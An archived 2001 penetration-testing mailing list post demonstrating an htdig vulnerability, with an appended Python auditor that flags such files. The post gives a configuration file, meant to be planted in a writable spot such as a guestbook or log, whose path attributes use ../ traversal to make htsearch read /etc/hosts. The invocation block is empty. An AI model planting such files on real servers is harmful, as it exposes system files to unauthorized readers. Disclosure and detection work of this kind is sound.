Penetration Testing mailing list archives

htdig HOWTO followup
From: "rudi carell" <rudicarell () hotmail com>
Date: Thu, 18 Oct 2001 08:19:09


just wanted to add an example to the recently posted htdig vulnerability ( credits to ghutchis () wso williams edu ) ... the problem is that there is no detailed info on how to test it ..

---cut here---
---cut here---

therefore ... a demo-exploit for a better understanding:

create a file with the following content anywhere on the machine htdig runs on (be creative and think of guestbooks, logfiles etc etc ..):

---cut here---
nothing_found_file: /etc/hosts
database_base: ${database_dir}/../../../../etc/
word_db: ${database_base}hosts
doc_index: ${database_base}hosts
doc_db: ${database_base}hosts
---cut here---

.. then let htsearch use it :

---cut here---
---cut here---

done ..


security () freefly com
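
A defender-side check for the planted-file pattern shown in the post, as an added example that is not part of the original message: it expands `${...}` references in htdig-style `name: value` lines and reports path attributes that resolve outside the expected directories. The function names, the benign sample, and the `/var/lib/htdig` and `/usr/share/htdig` roots are assumptions.

```python
import posixpath
import re

# Path-valued attributes that appear in the post's sample file.
PATH_ATTRS = {"nothing_found_file", "database_base", "word_db", "doc_index", "doc_db"}
ATTR_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*:\s*(.*?)\s*$")
VAR_RE = re.compile(r"\$\{(\w+)\}")

# The file content quoted in the post.
POST_SAMPLE = """\
nothing_found_file: /etc/hosts
database_base: ${database_dir}/../../../../etc/
word_db: ${database_base}hosts
doc_index: ${database_base}hosts
doc_db: ${database_base}hosts
"""

# Constructed benign configuration for comparison.
BENIGN_SAMPLE = """\
database_base: ${database_dir}/db
word_db: ${database_base}.words.db
nothing_found_file: /usr/share/htdig/nomatch.html
"""


def expand(value, attrs, depth=0):
    """Recursively substitute ${name} references from attrs."""
    if depth > 10:  # stop on self-referencing definitions
        return value
    return VAR_RE.sub(lambda m: expand(attrs.get(m.group(1), ""), attrs, depth + 1), value)


def audit(text, database_dir="/var/lib/htdig", roots=("/var/lib/htdig", "/usr/share/htdig")):
    """Return sorted (attribute, resolved_path) pairs outside roots (assumed values)."""
    attrs = {"database_dir": database_dir}
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if m:
            attrs[m.group(1)] = m.group(2)
    findings = []
    for name in sorted(PATH_ATTRS & attrs.keys()):
        resolved = posixpath.normpath(expand(attrs[name], attrs))
        if not any(resolved == r or resolved.startswith(r + "/") for r in roots):
            findings.append((name, resolved))
    return findings

if __name__ == "__main__":
    print(audit(POST_SAMPLE), audit(BENIGN_SAMPLE))
```

Run over files that untrusted users can write to (guestbooks, logs), every finding is a path attribute that would point htdig at a file outside its own data directories.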
